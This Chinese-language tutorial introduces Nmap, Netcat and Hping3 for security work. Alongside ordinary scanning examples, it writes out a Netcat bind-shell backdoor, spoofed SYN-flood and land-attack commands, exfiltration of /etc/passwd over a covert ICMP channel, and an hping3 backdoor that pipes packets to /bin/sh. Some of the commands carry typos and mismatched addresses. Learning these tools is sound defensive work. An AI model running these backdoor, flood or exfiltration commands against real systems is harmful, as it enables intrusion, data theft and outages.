在網絡安全領域,Nmap、Netcat、Hping3都是安全工程師必備的工具。Nmap主要作爲端口掃描器,偵查目標機的端口及服務狀態;而Netcat則整合了網絡中各種常用功能(如後門、文件傳輸、端口掃描、端口轉發等等),能輔助完成豐富的操作;Hping3主要作爲特定的TCPIP數據包產生與解析的工具,當然也可用於Ping操作。
1 Nmap
核心應用:蒐集基本信息
1.1 Nmap簡介
Nmap是目前業界最爲知名、最爲強大的端口掃描器。它是由Fyodor創建的開源軟件,在1997年首次發佈。十多年來,Nmap開發團隊一直不停地對其維護、更新,並規劃開發新的功能。Nmap在安全領域內非常流行,像***工具Metasploit、漏洞掃描工具openVAS等工具都內置了Nmap,而漏洞掃描工具Nessus也支持導入Nmap掃描結果。
Nmap是主要用於基本的信息的蒐集,包括主機活動狀態、主機端口開放狀況、應用服務及版本、操作系統與設備類型等等。另外Nmap完全支持IPv6;而Nmap腳本引擎(NSE)結合內置的豐富的Lua腳本讓其支持的功能更加全面、更加精細(如提供豐富的HTTP相關的掃描腳本)。
1.2 Nmap功能
Nmap功能用法非常簡單,這裏簡要回顧一下:
1.2.1 主機發現
nmap -sn -T4 targetip
1.2.2 端口掃描
nmap -T4 -s[scan method] -p[portrange] targetip
1.2.3 服務與版本偵測
nmap -T4 -sV targetip
1.2.4 操作系統掃描
nmap -T4 -O targetip
1.3 簡單示例
(掃描目標機的端口與OS類型):
詳細使用方法參考:http://blog.csdn.net/aspirationflow/article/details/7694274
2 Netcat
核心應用:完成網絡中各種輔助操作,被稱作TCPIP的瑞士軍刀
2.1 Netcat簡介
Netcat用於從TCP/UDP連接中讀取或發送網絡數據。cat是Linux中查看或連接文件的命令,所以netcat本意爲從網絡上查看文件內容。而Netcat的作者Hobbit爲它添加了非常豐富的功能,使它幾乎能夠完成網絡操作中各式各樣的操作,所以Netcat在網絡安全領域被稱作“TCPIP的瑞士軍刀”("Swiss-army knife forTCP/IP")。
Netcat穩定版1.10由Hobbit在1996年3月發佈(開源軟件),之後作者沒有再對其進行維護,但該工具十多年來依然在被廣泛地使用,而且基於Netcat的各種衍生工具也層出不窮,他們在很多方面增強或擴展了Netcat的功能。
Nmap團隊開發了Ncat作爲Netcat的升級版本,增加了更多的功能,讓其更能適應現代網絡環境的需求。
2.2 Netcat功能
2.2.1 網絡連接
類似於Telnet的功能,使用Netcat能夠簡便地登錄到目標機上開放的端口。
例如,
nc mail.server.net 25
向mail.server.net的25號TCP端口發起連接。
2.2.2 端口掃描
Netcat同樣可以進行端口掃描,但與Nmap相比,它的性能及使用範圍都很有限。如果只想簡單地探測幾個端口的開放狀態,使用Netcat也可行。
端口掃描格式如下:
nc –v –z hostnameport[s]
實例:
nc –v –z www.yahoo.com 80 22
掃描yahoo網站的80、22端口,判斷其是否開放。
2.2.3 文件傳輸
Netcat最初的用途就是文件傳輸,它可以像Cat命令一樣將讀取的文件重定向到網絡上的另外的文件。Netcat在網絡應用中既可以當做服務器端,開啓本機一個監聽端口,也可以作爲客戶端向其他服務器端口發起連接。所以,文件傳輸,即是在兩端分別運行Netcat。
在接受端,運行Netcat開啓端口監聽服務。
nc –L –p 4444 >receivedfile.zip
此處-L啓動監聽模式(即作爲服務器端),開啓4444端口,將接受到的數據寫入到文件somefile.zip中。
而在發送端,只需連接該服務器端開放的端口,並選擇需要發送的文件。
nc 192.168.1.43 4444< testfile.zip
使用<符號輸入testfile.zip文件,並向目標機的4444端口發起連接。在建立連接成功後,發送端會將文件傳送到接收端,接受端將收到的數據寫入receivedfile.zip文件。整個過程,比較類似於cat命令,因爲具體的網絡傳輸過程由Netcat負責。
2.2.4 開啓後門
Netcat甚至也可以用作後門程序。如果用戶已經侵入到一臺計算機,那麼讓該計算機在開機後(或其他條件下)自動啓動Netcat,打開指定的端口,等待用戶連接,在連接成功後執行特定程序(如cmd.exe,以便遠程執行命令)。
nc –L –p 4444 –e cmd.exe
以監聽模式啓動Netcat,開啓TCP端口4444,在與客戶端成功建立連接後,執行cmd.exe程序(-e cmd.exe,此處爲用戶打開命令行執行窗口,用戶可以通過命令操作此計算機)。
在客戶端,直接連接目標機的4444端口即可。
nc 192.168.1.43 4444
連接後,客戶端可以接收到一個命令行窗口。
2.2.5 端口轉發
端口轉發(PortForwarding)也是Netcat比較實用的用法。先將Netcat作爲服務器接收其他主機的連接,然後將連接的數據轉發另外的目標機端口。
比如:
mkfifo backpipe
nc -l 12345 0<backpipe | nc www.google.com 801>backpipe
比如,此處開啓端口12345,作爲www.google.com的代理。其他無法直接登陸google的用戶可以通過此代理端口來與google進行交互。這裏創建了一個fifo,是爲實現雙向數據通訊,因爲管道運算符本身是單向的。
2.2.6 標語提取
標語提取(BannerGrabbing)的含義是抓取應用程序在建立連接後打印的標語提示信息,例如建立FTP連接後,FTP服務器可能打印出提示信息:FTP xxx.xxx等數據。
所以,根據服務器打印的信息,有時可以推斷出對方服務程序的詳細版本。這也是Nmap進行服務與版本偵測採用方法。
例如,首先創建一份文件,包含以下文本:
HEAD / HTTP/1.0
<return>
<return>
然後,將此文件發送到目標服務器的80端口,誘發對方發送HTTP首部數據。
cat file>nc -vv -w 2 www.cnn.com 80 >output.txt
然後可從output.txt查看到對方的發送的HEAD的標語信息。
2.2.7 其他功能
Netcat其他常用的功能:
支持完全的DNS轉發、逆向檢查
支持用戶指定源端口
支持用戶指定源端IP地址
內置寬鬆源路由能力(loosesource-routing capability)
慢速發送模式,可指定每隔多少秒發送一行文本
將發送或接收數據以16進制格式導出
3 Hping3
核心應用:靈活地構建TCPIP數據包
3.1 Hping3介紹
Hping是用於生成和解析TCPIP協議數據包的開源工具。創作者是Salvatore Sanfilippo。目前最新版是Hping3,支持使用tcl腳本自動化地調用其API。Hping是安全審計、防火牆測試等工作的標配工具。
Hping優勢在於能夠定製數據包的各個部分,因此用戶可以靈活對目標機進行細緻地探測。
而Nmap團隊也開發了一款類似的工具Nping,集成在Nmap的安裝包中。
3.2 Hping3功能
Hping3主要有以下典型功能應用:
3.2.1 防火牆測試
使用Hping3指定各種數據包字段,依次對防火牆進行詳細測試。請參考:http://0daysecurity.com/articles/hping3_examples.html
測試防火牆對ICMP包的反應、是否支持Traceroute、是否開放某個端口、對防火牆進行拒絕服務***(DoS attack)。
例如,以LandAttack方式測試目標防火牆(Land Attack是將發送源地址設置爲與目標地址相同,誘使目標機與自己不停地建立連接)。
hping3 -S -c 1000000 -a 10.10.10.10 -p 21 10.10.10.10
3.2.2 端口掃描
Hping3也可以對目標端口進行掃描。Hping3支持指定TCP各個標誌位、長度等信息。
以下示例可用於探測目標機的80端口是否開放:
hping3 -I eth0 -S 192.168.10.1 -p 80
其中-Ieth0指定使用eth0端口,-S指定TCP包的標誌位SYN,-p 80指定探測的目的端口。
hping3支持非常豐富的端口探測方式,Nmap擁有的掃描方式hping3幾乎都支持(除開connect方式,因爲Hping3僅發送與接收包,不會維護連接,所以不支持connect方式探測)。而且Hping3能夠對發送的探測進行更加精細的控制,方便用戶微調探測結果。
當然,Hping3的端口掃描性能及綜合處理能力,無法與Nmap相比。一般使用它僅對少量主機的少量端口進行掃描。
3.2.3 Idle掃描
Idle掃描(Idle Scanning)是一種匿名掃描遠程主機的方式,該方式也是有Hping3的作者Salvatore Sanfilippo發明的,目前Idle掃描在Nmap中也有實現。
該掃描原理是:尋找一臺idle主機(該主機沒有任何的網絡流量,並且IPID是逐個增長的),***端主機先向idle主機發送探測包,從回覆包中獲取其IPID。冒充idle主機的IP地址向遠程主機的端口發送SYN包(此處假設爲SYN包),此時如果遠程主機的目的端口開放,那麼會回覆SYN/ACK,此時idle主機收到SYN/ACK後回覆RST包。然後***端主機再向idle主機發送探測包,獲取其IPID。那麼對比兩次的IPID值,我們就可以判斷遠程主機是否回覆了數據包,從而間接地推測其端口狀態。
3.2.4 拒絕服務***
使用Hping3可以很方便構建拒絕服務***。
比如對目標機發起大量SYN連接,僞造源地址爲192.168.10.99,並使用1000微秒的間隔發送各個SYN包。
hping3 -I eth0 -a192.168.10.99 -S 192.168.10.33 -p 80 -i u1000
其他***如smurf、teardrop、land attack等也很容易構建出來。
3.2.5 文件傳輸
Hping3支持通過TCP/UDP/ICMP等包來進行文件傳輸。相當於藉助TCP/UDP/ICMP包建立隱祕隧道通訊。
實現方式是開啓監聽端口,對檢測到的簽名(簽名爲用戶指定的字符串)的內容進行相應的解析。
在接收端開啓服務:
hping3 192.168.1.159--listen signature --safe --icmp
監聽ICMP包中的簽名,根據簽名解析出文件內容。
在發送端使用簽名打包的ICMP包發送文件:
hping3 192.168.1.108--icmp ?d 100 --sign signature --file /etc/passwd
將/etc/passwd密碼文件通過ICMP包傳給192.168.10.44主機。發送包大小爲100字節(-d 100),發送簽名爲signature(-sign signature)。
3.2.6 ***功能
如果Hping3能夠在遠程主機上啓動,那麼可以作爲***程序啓動監聽端口,並在建立連接後打開shell通信。與Netcat的後門功能類似。
示例:本地打開53號UDP端口(DNS解析服務)監聽來自192.168.10.66主機的包含簽名爲signature的數據包,並將收到的數據調用/bin/sh執行。
在***啓動端:
hping3 192.168.10.66--listen signature --safe --udp -p 53 |/bin/sh
在遠程控制端:
echo ls >test.cmd
hping3 192.168.10.44 -p53 -d 100 --udp --sign siganature --file ./test.cmd
將包含ls命令的文件加上簽名signature發送到192.168.10.44主機的53號UDP端口,包數據長度爲100字節。
當然這裏只是簡單的演示程序,真實的場景,控制端可以利益shell執行很多的高級複雜的操作。